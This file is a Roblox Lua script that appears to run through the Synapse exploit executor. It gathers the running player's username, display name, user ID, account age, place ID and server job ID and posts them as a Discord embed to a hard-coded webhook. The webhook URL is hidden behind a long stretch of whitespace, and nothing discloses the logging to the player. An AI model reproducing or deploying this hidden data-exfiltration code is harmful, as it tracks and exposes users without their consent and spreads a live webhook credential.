    local lp = game.Players.LocalPlayer.Name
    local player = game.Players.LocalPlayer
    local placeid = game.PlaceId
    local accage = game.Players.LocalPlayer.AccountAge
    local userid = game.Players.LocalPlayer.UserId
    local displayname = game.Players.LocalPlayer.DisplayName
    local jobid = game.JobId
    local GameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name

msg = {
["embeds"] = {{
["title"] = GameName,
    ["icon_url"]= "https://www.roblox.com/headshot-thumbnail/image?userId="..userid.."&width=420&height=420&format=png",
    ["description"] = "**Username:** " .. "```" .. lp .. "```" .. " **Display Name:** " .. "```" .. displayname .. "```" .. " **User Id:** " .. "```" .. userid .. "```" .. " **Account Age:** " .. "```" .. accage .. "```" .. " **Place ID:** " .. "```" .. placeid .. "```" .. " **JobID:** " .. "```".. jobid .."```",
    ["url"] = "https://www.roblox.com/home?placeId="..placeid.."&gameId="..jobid,
["color"] = 4280575,
["author"] = {
    ["name"] = lp,
    ["url"] = "https://www.roblox.com/users/"..userid.."/profile",
    ["icon_url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..userid.."&width=420&height=420&format=png",
},
["footer"] = {
    ["text"] = "Thanks "..lp.."!",
    ["icon_url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..userid.."&width=420&height=420&format=png"
}}
}
}
local response = syn.request(
{
Url =																					                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        	"https://discord.com/api/webhooks/989236954040254554/6vlFS1HnR2MjUu1XX6ZlxRWuidk7gSFooIYf0EEZVpyQkk3O1eYHT8ACgajq5srrt3ft",
Method = "POST",
Headers = {
["Content-Type"] = "application/json"
},
Body = game:GetService("HttpService"):JSONEncode(msg)
}
)
